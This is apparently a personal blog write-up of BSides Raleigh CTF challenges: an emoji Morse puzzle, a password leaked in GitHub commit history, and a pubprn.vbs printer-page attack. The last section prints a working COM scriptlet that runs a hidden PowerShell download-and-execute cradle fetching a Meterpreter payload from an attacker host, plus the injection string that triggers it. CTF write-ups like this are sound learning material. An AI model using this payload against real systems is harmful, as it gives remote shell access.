Taking some inspiration from my friend, Ray, I decided I’d write up some of the solutions to the various challenges I saw at this year’s BSides Raleigh CTF (capture-the-flag) events.ย And this time, I actually remembered to save some notes and screenshots!
This isn’t a record of every single challenge I saw, just a few that I thought were particularly interesting or noteworthy.
๐.html
This was a simple one…which I like, because I suck at CTF crypto challenges.ย The page was just these emoji spread out:
๐ฎ๐ฎ ๐ฎ๐ฎ๐๐ฎ ๐๐ฎ๐๐ ๐๐๐ ๐ฎ๐ฎ๐ ๐๐ฎ๐๐ฎ ๐ฎ๐ ๐๐ฎ ๐ฎ๐๐ฎ ๐ฎ ๐ฎ๐ ๐๐ฎ๐ฎ ๐ ๐ฎ๐ฎ๐ฎ๐ฎ ๐ฎ๐ฎ ๐ฎ๐ฎ๐ฎ ๐ ๐ฎ๐ฎ๐ฎ๐ฎ ๐ฎ ๐ฎ๐ฎ๐๐ฎ ๐ฎ๐๐ฎ๐ฎ ๐ฎ๐ ๐๐๐ฎ ๐ฎ๐ฎ ๐ฎ๐ฎ๐ฎ ๐ ๐ฎ๐ฎ๐ฎ๐ฎ ๐ฎ๐ฎ๐ฎ๐๐ ๐ฎ๐ ๐๐ฎ ๐๐ฎ ๐ฎ๐ฎ ๐ฎ๐ฎ๐ฎ๐ ๐ฎ ๐ฎ๐๐ฎ ๐ฎ๐ฎ๐ฎ ๐ฎ๐ฎ๐ฎ๐ฎ๐ ๐ฎ๐๐ฎ ๐๐ฎ๐๐ ๐ฎ๐ฎ๐ ๐ฎ๐๐๐ฎ ๐๐ฎ๐๐ฎ ๐ฎ๐ ๐ฎ๐ฎ๐ฎ ๐ฎ ๐๐ฎ๐ฎ
So I noticed right off the bat that there were only two emoji being used:ย ๐ฎย andย ๐.ย My initial thought was maybe this was something in binary, but I was dissuaded from that because of the variable lengths of emoji strings.
The next thought was Morse code!ย So I copied the emojis into Sublime, did a find/replace for each character, to get this:
.. ..-. -.– — ..- -.-. .- -. .-. . .- -.. – …. .. … – …. . ..-. .-.. .- –. .. … – …. …– .- -. -. .. …- . .-. … ….- .-. -.– ..- .–. -.-. .- … . -..
Running that through a Morse code translatorย yielded the message:
IFYOUCANREADTHISTHEFLAGISTH3ANNIVERS4RYUPCASED
So naturally, the flag was TH3ANNIVERS4RY.
Eversec Github
This is another easy one, but something perfectly applicable to real-life appsec reviews and pentests.
One thing you should always do, in CTF’s and in web app pentests, is check the HTML source for comments.ย Several of the pages on the main Eversec website had the following comment embedded near the end:
<!-- <a href="https://github.com/eversec-rocks/eversec-website"><img src="/images/express.svg"></a> Hiding until we can figure out how Github badges work -->
Following the link took us to Eversec’s Github page, which provides source code for Eversec’s website.
It’s always a good idea to check source code for things like hardcoded credentials, connection strings, or vulnerable version numbers.
Another important thing to check is the commit history for careless mistakes by developers.
The one labelled “lol didnt realize that would put my password on the internet” looks enticing.
And sure enough, there’s a flag!ย Important lesson for the devs out there: even if you realize you screwed up and delete sensitive info, your commit history can still betray you!
While it didn’t help here, another good idea when pentesting web apps that have open source code available is to pull down all the directory and file names you find and make a wordlist out of them.ย Take this wordlist and use it with your web content brute-forcer of choice (I like dirb personally, but DirBuster and gobuster are also popular) to see if any pages are reachable that shouldn’t be.
While I didn’t have time to solve it, Gabe told me afterwards that checking the versions of various JS libraries in use was the key to finding another vulnerability and flag in the Eversec site.
Printer Registration
I was apparently one of the only people that solved this one.ย The vulnerable server hosted a page for registering domain printers and advertised that it used the pubprn.vbs admin script to do this.
Using the default “PrinterName” value yielded an interesting error messsage.
My first inclination was to probe for command injection and try to break out of the “CScript” command, but no combination of semi-colons, pipes, or ampersands seemed to help.ย Then EversecCTF tweeted out this little hint:
Still no solves for the Eversec AD Printer registration page ๐ก pic.twitter.com/phJSYntZAp
โ Eversec CTF (@EverSecCTF) October 26, 2017
So I knew there must be something special about the pubprn.vbs script itself.ย After fumbling with the rather anemicย TechNet documentation for pubprn.vbs, I turned up some better info via googling.ย A recent presentation by Casey Smith (@subTee) and Matt Nelson (@enigma0x3) showed how they abused pubprn.vbs to inject and have the system execute scriptlets for them (video and blog post).
According to the TechNet docs, the pubprn.vbs script is expecting two arguments: a server name and an LDAP path to the AD container where you want the printer published.ย But since it’s using the GetObject() method to read that second parameter, you can feed it COM scriptlets instead!
One of my favorite Metasploit modules for when I find command injection on web apps is “exploit/multi/script/web_delivery.”ย Coincidentally, Casey Smith is one of the contributors to that module too!ย It works similar to the trusty old “exploit/multi/handler” module, except it starts up a web server to host your chosen exploit and generates a command for you to run on the machine, in your choice of PowerShell, Python, PHP, or Regsrv32 format.
Looking back at it now, the “Regsrv32” option actually generates a COM scriptlet like what I ended up writing myself, so I probably could’ve saved myself some trouble and just done that, lol.ย Oh well, I chose the “Powershell” target option, picked good old Windows x64 Meterpreter for the payload, and fired up the module.ย The bit at the end of the screenshot, where it says “Run the following command on the target machine,” is what I would put into my COM scriptlet.
Sadly, the blog post code is a little mangled and the Github repo with their proofs-of-concept is gone now, but it was still up when this CTF was going on and I was able to alter it and make a custom payload.ย I wrote this payload in a text editor, then saved it with a .png file extension.ย I don’t exactly remember why I did it that way, either, rather than just save it as some other type of file.
<?XML version="1.0"?>
<scriptlet>
<registration
description="test"
progid="test"
version="1.00"
classid="{BBBB4444-0000-0000-0000-0000FAADACDC}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.168.0.52:8080/goM6mwsH')");
]]>
</script>
</scriptlet>
As you can see in the JScript portion of the payload, I created an ActiveX Object and told it to run the PowerShell command generated by “exploit/multi/script/web_delivery”.ย All I had to do from there was go to the Print Registration page and enter the following into the Printer Name text box:
127.0.0.1 script:http://192.168.0.51:8000/hi.png
…and I had a shell on the box!ย And since it was running under the Administrator’s context, no priv-esc required.ย I found a few flags on the box and submitted for the points.
I ended up taking second place in the CTF, with @securisec claiming the #1 spot.ย Since I’m good friends with the CTF organizers, I waived my claim to any prizes and let some of the other contestants take them.
Besides the CTF, I also had the pleasure of speaking on a panel about CTFs with my teammates from EverSec (Gabe Marshall, Clayton Dorsey, Ray Doyle, and Garrett Galloway) and Jordan Weinsย of Binary Ninja fame.ย The day before, I also managed to get a ticket to a small class that Jordan gave on binary reversing using Binary Ninja.
The other highlight of the conference was getting to meet Dr. Cliff Stoll himself, of The Cuckoo’s Egg fame, who delivered the keynote.ย Both the panel and keynote were allegedly recorded, so I’ll update this space with links if they ever upload them to YouTube.
Me, Dr. Cliff Stoll, and Ray Doyle (@doylersec)
Dan Helton's Blog 